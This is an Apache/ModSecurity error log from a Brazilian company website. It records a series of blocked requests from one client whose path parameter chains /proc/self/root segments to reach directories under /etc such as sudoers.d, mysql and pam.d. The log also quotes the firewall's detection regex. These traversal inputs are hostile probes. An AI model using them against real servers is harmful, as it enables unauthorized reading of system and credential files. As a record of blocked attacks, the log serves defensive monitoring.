[Fri Mar 20 06:43:33.957612 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:45820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Wxda6ubjKNq_cu4bC8gAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:39.507174 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:45830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Wy9a6ubjKNq_cu4bC-AAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:41.555791 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:32968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WzLninkcc-iUj5ApO6QAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:43.108282 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.243.128:32984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Wz_XLqtnMIWvjpaKKRgAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:46.566573 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:32996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0W0uoXxyEfFpUF8f9ygAAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:43:53.290362 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:33006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0W2RCii7xarUs8iHZYmQAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:44:01.085205 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:59590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0W4TJ3M9BSuKP7CAYIywAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:44:18.555433 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:59424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0W8vXLqtnMIWvjpaKKYwAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:44:34.880459 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:58642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0XAta6ubjKNq_cu4bDJQAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:44:36.158507 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.243.128:51166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0XBPHIg5MgXLBnicPpswAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:44:37.345623 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:51172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0XBRCii7xarUs8iHZYyAAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:44:51.843410 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.243.128:51186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0XE_HIg5MgXLBnicPpzQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:44:55.257943 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:45288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0XF9a6ubjKNq_cu4bDUQAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:45:12.507133 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:45294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0XKBCii7xarUs8iHZY6QAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:45:25.720727 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:48412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0XNTJ3M9BSuKP7CAYJHQAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:45:29.495071 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.243.128:60928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0XOfHIg5MgXLBnicPp3QAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:48:01.406435 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:45298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0X0fXLqtnMIWvjpaKLrQAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:48:03.053464 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:37624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0X0xCii7xarUs8iHZZHgAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:48:05.326628 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:37632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0X1RCii7xarUs8iHZZIgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:49:36.724231 2026] [mime_magic:error] [pid 15826:tid 140411716749056] (70014)End of file found: [client 57.141.18.12:34804] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:50:02.100753 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 57.141.18.24:35342] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:50:15.315636 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:44458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YVzJ3M9BSuKP7CAYKCAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:50:16.742653 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:44462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0YWOoXxyEfFpUF8f9zaAAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
